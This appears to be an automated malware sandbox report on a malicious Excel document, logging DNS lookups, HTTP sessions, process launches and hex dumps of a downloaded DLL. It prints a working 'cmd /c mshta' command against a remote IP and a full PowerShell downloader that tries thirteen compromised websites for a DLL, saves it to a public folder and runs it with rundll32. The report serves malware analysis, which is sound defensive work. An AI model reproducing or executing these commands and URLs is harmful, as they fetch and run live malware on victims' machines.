Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 28, 2022 20:52:28.023185015 CET | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Jan 28, 2022 20:52:28.076164961 CET | 53 | 52167 | 8.8.8.8 | 192.168.2.22

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 28, 2022 20:52:28.023185015 CET | 192.168.2.22 | 8.8.8.8 | 0xfee6 | Standard query (0) | www.yeald.finance | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 28, 2022 20:52:28.076164961 CET | 8.8.8.8 | 192.168.2.22 | 0xfee6 | No error (0) | www.yeald.finance | | 94.130.116.76 | A (IP address) | IN (0x0001)
                                                                                                                        • www.yeald.finance
                                                                                                                        • 91.240.118.168
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 94.130.116.76 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49165 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 20:52:22.327665091 CET | 0 | OUT | GET /zzx/ccv/fe.html HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 91.240.118.168
Connection: Keep-Alive
Jan 28, 2022 20:52:22.388957024 CET | 2 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 28 Jan 2022 19:52:22 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 11101
Last-Modified: Wed, 26 Jan 2022 22:19:29 GMT
Connection: keep-alive
ETag: "61f1c8f1-2b5d"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49166 | 91.240.118.168 | 80 | C:\Windows\System32\mshta.exe

Timestamp | kBytes transferred | Direction | Data
Jan 28, 2022 20:52:27.917165041 CET | 13 | OUT | GET /zzx/ccv/fe.png HTTP/1.1
Host: 91.240.118.168
Connection: Keep-Alive
Jan 28, 2022 20:52:27.975884914 CET | 14 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Fri, 28 Jan 2022 19:52:27 GMT
Content-Type: image/png
Content-Length: 1236
Last-Modified: Wed, 26 Jan 2022 22:19:20 GMT
Connection: keep-alive
ETag: "61f1c8e8-4d4"
Accept-Ranges: bytes
Data Ascii: $path = "C:\Users\Public\Documents\ssd.dll";$url1 = 'https://www.yeald.finance/wp-admin/1WgPRm/';$url2 = 'http://sneakadream.com/wp-content/pccmAOq/';$url3 = 'https://umanostudio.com/wp-admin/n1LG7aJnptBlQkC/';$url4 = 'https://weddingbandsirelandjbk.com/hgsynt2/o/';$url5 = 'https://getcode.info/wp-content/QDx8b5j/';$url6 = 'https://falah.org.pk/vegasvulkan1000.falah.org.pk/ZBRx4QuUXfLH/';$url7 = 'https://chochungcuhanoi.com/wp-content/cyE2u0cnolP/';$url8 = 'https://allaagency.ro/wp-admin/7/';$url9 = 'http://tattooblog.cn/wp-includes/KJLv/';$url10 = 'https://palankhir.hu/tools/GJRNhZHz/';$url11 = 'http://masboni.com/wp-admin/3zUQl/';$url12 = 'https://tanquessepticos.com/wp-admin/ApVVbl1fQ0/';$url13 = 'http://starspeedng.com/One-File/U3Trml/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try { $web.DownloadFile($url, $path); if ((Get-Item $path).Length -ge 30000) { [Diagnostics.Process]; break
Jan 28, 2022 20:52:27.975898981 CET | 14 | IN
Data Ascii: ; } } catch{}} Sleep -s 4;cmd /c C:\Windows\SysWow64\rundll32.exe 'C:\Users\Public\Documents\ssd.dll',AnyString;


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49168 | 160.16.102.168 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 94.130.116.76 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-28 19:52:28 UTC | 0 | OUT | GET /wp-admin/1WgPRm/ HTTP/1.1
Host: www.yeald.finance
Connection: Keep-Alive
2022-01-28 19:52:28 UTC | 0 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 28 Jan 2022 19:52:28 GMT
Content-Type: application/x-msdownload
Content-Length: 548864
Connection: close
Set-Cookie: 61f4497c75177=1643399548; expires=Fri, 28-Jan-2022 19:53:28 GMT; Max-Age=60; path=/
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Fri, 28 Jan 2022 19:52:28 GMT
Expires: Fri, 28 Jan 2022 19:52:28 GMT
Content-Disposition: attachment; filename="iGyKncX6PkzSkNuPH.dll"
Content-Transfer-Encoding: binary
                                                                                                                        Data Ascii: ZLT$BJ3MHT$BJ3l|T$BJ3g|HT$Bx3J3|4|MT$Bt3KJ3AMT$BJ3$
                                                                                                                        2022-01-28 19:52:28 UTC288INData Raw: 31 25 82 68 84 69 80 48 c5 04 10 3d 9f 01 10 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 00 00 49 6e 69 74 43 6f 6d 6d 6f 6e 43 6f 6e 74 72 6f 6c 73 45 78 00 00 00 00 48 74 6d 6c 48 65 6c 70 41 00 00 00 68 68 63 74 72 6c 2e 6f 63 78 00 00 08 c9 04 10 c8 c6 01 10 a0 c6 01 10 96 c6 01 10 10 2e 02 10 28 c5 01 10 f4 c8 04 10 aa c6 01 10 be c6 01 10 b4 c6 01 10 b1 bf 01 10 00 00 00 00 10 c7 04 10 61 c6 01 10 36 c6 01 10 43 c6 01 10 2f c0 01 10 50 c0 01 10 00 c0 01 10 c8 bf 01 10 24 bb 01 10 53 bb 01 10 82 bb 01 10 c2 bb 01 10 02 bc 01 10 42 bc 01 10 82 bc 01 10 c2 bc 01 10 02 bd 01 10 42 bd 01 10 8a bd 01 10 ca bd 01 10 f9 bd 01 10 28 be 01 10 68 be 01 10 9a be 01 10 f2 be 01 10 35 bf 01 10 6b bf 01 10 99 bf 01 10 99 bf 01 10 7a c6 01 10 04 7e 04 10
                                                                                                                        Data Ascii: 1%hiH=InitCommonControlsInitCommonControlsExHtmlHelpAhhctrl.ocx.(a6C/P$SBB(h5kz~
                                                                                                                        2022-01-28 19:52:28 UTC304INData Raw: be 04 10 00 00 00 00 00 30 05 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 ec bd 04 10 28 30 05 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 4c be 04 10 00 00 00 00 00 00 00 00 04 00 00 00 5c be 04 10 30 be 04 10 70 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 40 30 05 10 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 8c be 04 10 00 00 00 00 00 00 00 00 03 00 00 00 9c be 04 10 70 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 5c 30 05 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 be 04 10 00 00 00 00 00 00 00 00 02 00 00 00 d8 be 04 10 ac be 04 10 e4 be 04 10 00 00 00 00 78 30 05 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 bf 04 10 00 00 00 00 00 00 00 00 01 00 00 00
                                                                                                                        Data Ascii: 0@(0@L\0p@0@p\0@x0@
                                                                                                                        2022-01-28 19:52:28 UTC320INData Raw: 00 00 00 ff ff ff ff 15 4a 04 10 00 00 00 00 1d 4a 04 10 22 05 93 19 02 00 00 00 10 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 40 4a 04 10 22 05 93 19 01 00 00 00 44 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 63 4a 04 10 22 05 93 19 01 00 00 00 70 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff 86 4a 04 10 22 05 93 19 01 00 00 00 9c fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ff ff ff ff a9 4a 04 10 22 05 93 19 01 00 00 00 c8 fe 04 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 54 32 05 10 90 ff ff ff 9f 85 02 10 00 00 00 00 54 32 05 10
                                                                                                                        Data Ascii: JJ"@J"DcJ"pJ"J"T2T2
                                                                                                                        2022-01-28 19:52:28 UTC336INData Raw: 50 61 72 73 65 44 69 73 70 6c 61 79 4e 61 6d 65 40 40 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 4f 6c 65 49 50 46 72 61 6d 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 43 6f 6e 74 61 69 6e 65 72 40 40 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 49 6e 50 6c 61 63 65 46 72 61 6d 65 40 40 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4f 6c 65 49 6e 50 6c 61 63 65 55 49 57 69 6e 64 6f 77 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 43 44 61 74 61 53 6f 75 72 63 65 43 6f 6e 74 72 6f 6c 40 40 00 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 55 49 4e 6f 74 69 66 79 44 42 45 76 65 6e 74 73 40 40 00 00 00 8c 9b 04 10 00 00 00 00 2e 3f 41 56 58 4f 6c 65 43 6c 69 65 6e 74 53 69 74 65 40 43 4f 6c 65 43 6f 6e 74 72 6f 6c 53 69 74 65 40 40 00 00 00 00 8c 9b 04 10
                                                                                                                        Data Ascii: ParseDisplayName@@.?AVXOleIPFrame@COleControlContainer@@.?AUIOleInPlaceFrame@@.?AUIOleInPlaceUIWindow@@.?AVCDataSourceControl@@.?AUINotifyDBEvents@@.?AVXOleClientSite@COleControlSite@@
                                                                                                                        2022-01-28 19:52:28 UTC352INData Raw: 20 80 30 22 d7 5f 20 12 26 4a 67 58 11 16 b6 dc b6 23 9d 92 00 5a 89 00 9d 78 b5 ba 0c 68 8a 20 14 47 93 53 8c 0d f8 19 b2 14 cb d9 c5 31 55 2c 4f 1c 81 8f d0 3a 9c c6 e5 f5 c7 a8 1c 7e e2 e0 90 cd 24 3f 28 e9 fc 74 f2 f2 6c 53 da ef 54 0b a6 93 60 77 f9 0e c0 3e 06 ba da 53 68 d6 c3 81 fb 17 71 96 d1 39 7b 0b 7d 1d ef 8c d8 67 30 d2 04 30 34 43 6a 90 9f fe 6d 79 17 0d 60 2f d4 e1 be 81 20 37 a6 49 ce 89 e7 e9 a1 97 ba 88 9e cb 35 bd c2 47 12 43 70 43 8e bf be 18 79 14 b7 cb 8d 39 2a 34 4b 98 20 df b8 38 75 7b 07 a8 66 9a 54 0b fa 74 3f 31 8e 22 30 03 3e e2 55 d5 c9 ab 21 c7 e3 65 bd 25 a3 54 f5 39 35 b4 45 9c 6a ad 92 86 7e b1 fd a0 06 c5 e3 54 f5 18 a6 32 79 8f 86 77 ef a0 53 60 9d 5e 2d 3e c2 ba 65 5e 5e f6 6a 7d 6a 4e 64 ca c3 1e 46 a6 3a a9 a1 52 c0
                                                                                                                        Data Ascii: 0"_ &JgX#Zxh GS1U,O:~$?(tlST`w>Shq9{}g004Cjmy`/ 7I5GCpCy9*4K 8u{fTt?1"0>U!e%T95Ej~T2ywS`^->e^^j}jNdF:R
                                                                                                                        2022-01-28 19:52:28 UTC368INData Raw: 35 5f 03 c0 94 e8 a7 41 95 79 e0 7d aa 34 bf 83 47 b7 ac 04 c6 b4 ad 21 0e 59 1a 69 14 1f b2 32 6d be 96 08 90 3b 9b 0d 04 59 a3 bd c4 74 20 d1 a5 46 7f 11 60 a6 a1 31 28 89 62 21 aa e9 78 39 ba 3d ae ce f7 bb 88 56 0b 95 b7 c6 85 27 55 aa b8 e7 43 4e 2e 04 0d 0a 2c 0d dd 42 17 41 1e c2 30 c2 a2 07 2c 1b 44 43 c8 7b ce 66 aa 6a e6 a7 ff c4 d6 99 90 e8 10 1d 4b 0a fd f8 bd ad 84 bf 49 4c 6a d4 b3 a7 e4 ca ef b0 73 a5 f3 6a d8 34 82 83 a7 b7 8e 7a 5e 11 ce dc 3e 5c f1 8a 63 5e 7b c5 16 77 d4 b0 cf 93 d5 fa 84 f4 f2 9b 36 5d 5c 65 ca 6e f5 e6 0c ad 0c f5 bc 73 f1 46 13 a5 ae dc 8e 45 48 2b 5a 56 b9 6e 7c dc 2f 29 a6 a1 1a 01 21 18 d4 6d 6f 59 6c 85 4b 69 00 3b 37 00 1c 0b b6 1d 8f 64 c9 36 e2 f8 e5 d8 6b 55 6a 38 81 ee 4e 46 c1 03 b3 f4 51 43 5f 0c 52 c0 be
                                                                                                                        Data Ascii: 5_Ay}4G!Yi2m;Yt F`1(b!x9=V'UCN.,BA0,DC{fjKILjsj4z^>\c^{w6]\ensFEH+ZVn|/)!moYlKi;7d6kUj8NFQC_R
                                                                                                                        2022-01-28 19:52:28 UTC384INData Raw: d6 6d c4 b5 dd 35 75 07 41 15 64 6f 6d c8 91 45 80 ef 67 e1 f3 41 ca 29 84 e8 e4 07 d6 2e 0e 22 5c e7 94 0f 8b 03 57 4a 44 d8 b3 94 9b 1d 50 9a 67 cb d6 61 bf a2 6b 6a d3 7a ce 24 9b 7f 9a eb 42 f8 24 dc e2 32 0d 39 8c 63 43 6d 51 0f be 31 8a f2 d8 a4 8a 0d a1 02 8d f8 9b 39 1f 33 bd 1f de 7e f3 a6 de 73 26 fa ff 46 be 5e 4c 11 ad 22 87 6f 34 c9 3f 44 b9 a0 a9 73 5e a5 1a 84 84 4e 85 a3 da 9a 72 03 ed 50 87 76 38 28 aa 39 ae fa 8a 05 be b6 70 82 d0 99 b3 52 eb 56 20 bb b9 bd f9 23 46 32 00 a1 87 9c 7e 79 64 46 21 06 40 0f aa ac 21 75 46 bd 93 11 df d1 c0 a6 66 a2 6e dd 26 dd df 1e 22 7f cc 61 19 bb 4e 18 b9 a6 47 f6 99 d2 54 86 ab 2d da 6f 1c ca 2f 3b 3e 45 25 bb 11 ba dd 0c 99 e3 0f 02 f3 1d 05 a1 e8 c9 0a 18 5d 69 c8 6a 2e 0a 92 d7 ee b8 6b 64 6e 48 a0
                                                                                                                        Data Ascii: m5uAdomEgA)."\WJDPgakjz$B$29cCmQ193~s&F^L"o4?Ds^NrPv8(9pRV #F2~ydF!@!uFfn&"aNGT-o/;>E%]ij.kdnH
                                                                                                                        2022-01-28 19:52:28 UTC400INData Raw: 29 a0 d6 0b 33 d2 fb 3c e7 b0 02 2b 5d cf 11 df d4 89 01 28 a1 9c ca f5 3b 30 21 48 05 06 33 cf ea b8 95 3a b9 1d bb b3 3f 94 5c ae 12 1d 2b 44 c3 c2 93 25 76 db b3 41 9b 3e 65 79 d3 b4 b9 69 eb 0b 48 2b 83 3d f9 00 32 4b ae 9a c2 47 a7 a5 fc 8d 81 a9 07 bc 81 c9 54 61 e2 ce c7 f5 61 8f b7 42 00 06 c0 f1 b4 31 7d 03 2a 78 f4 d2 00 bf 3f e2 27 5b 18 42 f2 21 5f 23 f8 0c 27 3a be 7d 4b 16 a6 9d 23 7c 11 51 9f 87 10 df b5 23 5e 6a a8 40 b6 4b 3a e2 3c a6 be 32 ca fc 40 d5 ef cf 40 88 77 e0 5e ea 8f ff 3d 5d 60 cc aa 64 e3 b8 54 47 b8 e7 d9 2b 73 63 12 7a ba 78 ca 5d e7 69 ac fa a0 72 06 96 80 bd 92 68 8d d5 3c 53 09 d1 07 63 82 51 41 e5 88 84 43 48 12 c8 e7 7c 5e f2 93 b6 18 dc bb 8f 15 93 9d 8b b9 96 5f 77 8b b2 fb a2 6a 4b 28 4c 94 cb e5 54 1d 32 3e 1d 28
                                                                                                                        Data Ascii: )3<+](;0!H3:?\+D%vA>eyiH+=2KGTaaB1}*x?'[B!_#':}K#|Q#^j@K:<2@@w^=]`dTG+sczx]irh<ScQACH|^_wjK(LT2>(
                                                                                                                        2022-01-28 19:52:28 UTC416INData Raw: b7 79 aa b6 1f 95 b9 4e 21 08 09 6f f5 11 c0 35 e1 aa 61 49 01 61 67 a8 71 e1 a7 24 5b 2f 2f ad 3c e6 1f c9 a2 7a be 79 04 13 b4 5c 6c b2 1e ff bb 50 45 54 bb 7f 2e 70 ca 2d 43 c7 83 1a 47 b2 fa cf 00 c2 89 88 eb 76 88 b8 31 fc 0d 10 fd b4 df 2b fa 63 76 ca 13 9d 49 9c 46 1d bb 84 64 de b1 ae 6b 2b 7d d6 2a b0 c3 40 af 31 0b e0 76 61 44 b3 62 23 8a 27 e0 d1 1e 8f c3 51 ba c6 89 f3 22 ce 91 05 94 f7 29 1e a9 ca da 63 21 2d f7 88 5d fe 64 0f 21 73 49 2f b1 68 e4 cc c9 67 96 70 9f 3d e6 e0 8a b3 6d 9a 01 c5 37 a1 3b c0 46 09 6b ec 2a 94 3e 29 a3 11 01 8d 49 46 c5 ce 9b 5a 1e d5 00 1a aa 16 b6 f7 80 59 13 df d3 92 82 bb f2 f6 65 6d 85 0c 0a ed 7a 5b 80 8f 98 72 4e 0a 22 59 e5 f0 5b 80 fc fb e0 1a 19 fa eb 39 32 19 38 47 eb 91 ea fa d7 e5 5e db d4 20 5b 58 7d
                                                                                                                        Data Ascii: yN!o5aIagq$[//<zy\lPET.p-CGv1+cvIFdk+}*@1vaDb#'Q")c!-]d!sI/hgp=m7;Fk*>)IFZYemz[rN"Y[928G^ [X}
                                                                                                                        2022-01-28 19:52:28 UTC432INData Raw: 5a 21 27 44 d1 be 3d f0 1c 3c c0 9a 3a c6 fd 1d 6f 09 ca cb 00 35 e6 5d 62 b8 90 ea cc f9 9b 84 be bd 1f a9 88 cc 37 72 8d a2 42 e0 c9 44 c8 56 96 d5 63 1a 4c 8e dd 76 3f 6b 79 52 81 fb ca b1 d2 0d e1 f1 3c 85 ce 46 df d5 01 c8 6a c9 f6 14 ef ce 7b f6 1b 7d 15 16 45 1d a6 f4 be 48 8f 18 40 ad 23 0f c5 8e 2d 65 e3 a6 d5 33 a7 09 e1 32 38 ae c1 f4 a0 08 f4 7f b3 22 a1 0a 93 31 ab 51 94 5a 2c 94 dd 1c 9c b7 ce 29 a3 fa c9 d9 76 09 d4 98 96 f7 d6 51 2c 27 cf 5d 17 8e 34 b8 f9 48 f2 5a a8 45 83 43 c6 d7 10 33 1a c9 e4 db e8 e4 bf 3c e0 9c 22 da 48 e0 0b ec cb 9b 91 df 7e 00 89 d9 b9 b4 f2 78 27 a2 05 be 9a 57 cf 7f f3 41 66 2c 13 c0 69 83 16 29 06 98 b6 ea 0c 0a 01 2b 0e 67 df 89 e2 65 c0 8f e3 ad c4 f9 97 af 03 da f4 60 b1 0f 1b 24 29 4d 2b ec cd 80 5f c0 e9
                                                                                                                        Data Ascii: Z!'D=<:o5]b7rBDVcLv?kyR<Fj{}EH@#-e328"1QZ,)vQ,']4HZEC3<"H~x'WAf,i)+ge`$)M+_
                                                                                                                        2022-01-28 19:52:28 UTC448INData Raw: 69 d4 2c 2b 88 1d bd c1 b5 8f 0a cb a8 29 2e 80 30 86 5e 71 b0 8d 53 5f ec 08 87 27 59 a0 38 4d b4 ef 18 0c c7 a3 77 ea 56 52 b3 57 ec 92 7a db 1c 47 15 fb 3e 6f 82 94 25 3e bb b5 31 3c 5f 38 ff 57 0d 0d c9 07 52 10 19 d8 39 51 d2 1d 7f e0 65 b7 e0 a6 98 c8 3d 36 9c f5 d6 a4 3e 0d 8c c4 46 b6 d0 82 60 ec 8b 35 ac a7 18 88 a9 b5 38 12 51 44 07 d4 bb b3 f8 94 d3 ff 7b 54 ac b3 4f 6d 5f 65 64 21 d8 73 47 0e 5c 42 e8 cf e3 6f 1d 1b 67 3c 54 24 44 18 25 52 54 b3 34 19 31 3b 3c 9c 2c 84 93 db 41 4d 3b e0 4f 0a 07 71 c6 a1 a1 03 13 f9 08 41 71 30 2d 74 cb 83 f4 41 7c 81 60 fd e9 e0 7d 25 f1 89 13 8b 6c 3c c6 3e 04 4f e6 05 2e e3 ab 1f 09 00 61 f9 de 06 9f a4 aa 39 f9 1f 4d 1b 77 c9 ab ae d5 25 68 f1 47 b5 e8 7f 7d ae 98 b0 26 37 c6 e0 84 d2 39 11 e0 eb 5c f1 3d
                                                                                                                        Data Ascii: i,+).0^qS_'Y8MwVRWzG>o%>1<_8WR9Qe=6>F`58QD{TOm_ed!sG\Bog<T$D%RT41;<,AM;OqAq0-tA|`}%l<>O.a9Mw%hG}&79\=
                                                                                                                        2022-01-28 19:52:28 UTC464INData Raw: 1b 68 8d a8 6b f7 53 81 0f 29 c7 c9 c2 d6 ac cc 12 43 7f 30 d0 91 62 dc ca 54 3b 58 fb 23 9a eb 7c e6 7c e7 25 a2 78 bf 1d ea 00 5a 78 60 20 af 2d 68 19 72 c2 63 42 9b e9 58 32 5a 8e 5a 43 38 a1 48 6f 8d 26 88 82 0c af 68 01 8a 6b 2a 2d ac 9e f6 b1 05 af f4 57 0e 14 d4 a9 8e 9b 85 95 a8 5c ea 40 1f 23 eb 74 3d 75 74 3a 59 7a 5c 3f 17 6e 2d f9 77 ef 47 6b 50 a2 e8 05 1c f7 31 d0 08 5f 3e eb 56 44 d4 40 31 7f 99 14 9d 2c 7f b0 1d ff 01 f2 44 6e 14 e2 e8 f2 0b 85 b1 ef 01 80 2c 56 96 66 6b b5 3b f9 97 92 e5 73 15 a5 c2 f8 a5 a0 26 4d 7c 6c a8 4a 0a 5c 2d 9d 79 07 ea a0 42 fb 63 d4 e9 9f 47 1f c8 26 7b 40 eb ee 33 c8 5f 5f 4b 4b e8 49 94 39 82 47 8d bb e6 e7 e0 65 02 5b 53 7c 66 34 ff ca 43 59 3c 78 b7 27 19 b1 2f f0 2c ef b9 8d a0 23 82 9d a4 85 7d 22 52 17
                                                                                                                        Data Ascii: hkS)C0bT;X#||%xZx` -hrcBX2ZZC8Ho&hk*-W\@#t=ut:Yz\?n-wGkP1_>VD@1,Dn,Vfk;s&M|lJ\-yBcG&{@3__KKI9Ge[S|f4CY<x'/,#}"R
                                                                                                                        2022-01-28 19:52:28 UTC480INData Raw: 45 10 88 ba 62 bb 89 65 d1 ae 15 89 04 df b7 b4 45 e7 7f 82 07 67 85 58 54 f8 e7 6b 13 10 a6 8f 29 5b 49 f0 5f c3 da ab 00 38 1e e3 01 05 e3 72 f3 ee 3f 01 fe 9c 77 a0 d8 ba ec b9 42 14 99 1d 5c a6 ce ec 79 f4 1d 21 d4 11 e0 96 36 4e 1c fa 7b 72 51 e2 93 02 00 80 8f b4 52 39 1d 46 b1 85 29 90 6b 12 ef f9 0b b6 1c 17 fe fa fe b2 0b ce 13 a6 cd 17 21 dd 35 93 21 01 22 cf 20 cd f9 71 cb a8 17 01 c1 29 de 5a 10 92 d7 b5 31 a9 38 a8 84 6f 30 59 07 bd 5a 99 a4 b2 e1 55 d9 80 83 0a 2d ec e9 c9 23 62 5a ca d7 1a ed fa e1 14 c9 40 6c 65 30 15 e1 c6 ae 50 d1 24 ac d9 4c 55 5e 5b 15 23 34 a1 3d 71 e6 dd 67 5a 7f 58 78 83 ff c9 6b d3 29 de 58 71 1b 53 1a a6 2a ec 82 b5 b0 85 50 f4 f8 43 b8 45 f0 ac 63 ef f8 62 7f 97 2d 5b 35 e8 17 fa c2 7f 53 7e 36 a2 7e c3 6b 6a 73
                                                                                                                        Data Ascii: EbeEgXTk)[I_8r?wB\y!6N{rQR9F)k!5!" q)Z18o0YZU-#bZ@le0P$LU^[#4=qgZXxk)XqS*PCEcb-[5S~6~kjs
                                                                                                                        2022-01-28 19:52:28 UTC496INData Raw: 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44
                                                                                                                        Data Ascii: INGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
                                                                                                                        2022-01-28 19:52:28 UTC512INData Raw: 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0 3a c4 3a c8 3a cc 3a d0 3a d4 3a d8 3a dc 3a e0 3a e4 3a e8 3a ec 3a f0 3a f4 3a f8 3a fc 3a 00 3b 04 3b 08 3b 0c 3b 10 3b 14 3b 18 3b 1c 3b 20 3b 24 3b 28 3b 2c 3b 30 3b 34 3b 38 3b 3c 3b 40 3b 44 3b 48 3b 4c 3b 50 3b 54 3b 88 3b 8c 3b e8 3b ec 3b f0 3b f4 3b f8 3b fc 3b 00 3c 70 3c 74 3c 00 a0 04 00 d0 00 00 00 d0 39 d4 39 d8 39 dc 39 e0 39 e4 39 e8 39 ec 39 f0 39 f4 39 f8 39 fc 39 00 3a 04 3a 08 3a 0c 3a 10 3a 14 3a 18 3a 1c 3a 20 3a 24 3a 28 3a 2c 3a 30 3a 34 3a 38 3a 3c 3a 40 3a 44 3a 48 3a 4c 3a 50 3a 54 3a 58 3a 5c 3a 60 3a 64 3a 68 3a 6c 3a 70 3a 74 3a 78 3a 7c 3a 80 3a 84 3a 88 3a 8c 3a 90 3a 94 3a 98 3a 9c 3a a0 3a a4 3a a8 3a ac 3a b0 3a b4 3a b8 3a bc 3a c0 3a c4 3a c8 3a cc 3a d0 3a d4 3a
                                                                                                                        Data Ascii: :::::::::::::::::::::::::;;;;;;;; ;$;(;,;0;4;8;<;@;D;H;L;P;T;;;;;;;;;<p<t<999999999999:::::::: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:::::::::::::::::::::::
                                                                                                                        2022-01-28 19:52:28 UTC528INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:



                                                                                                                        Target ID:0
                                                                                                                        Start time:20:52:17
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                        Imagebase:0x13f720000
                                                                                                                        File size:28253536 bytes
                                                                                                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        Target ID:2
                                                                                                                        Start time:20:52:19
                                                                                                                        Start date:28/01/2022
                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:cmd /c mshta http://91.240.118.168/zzx/ccv/fe.html
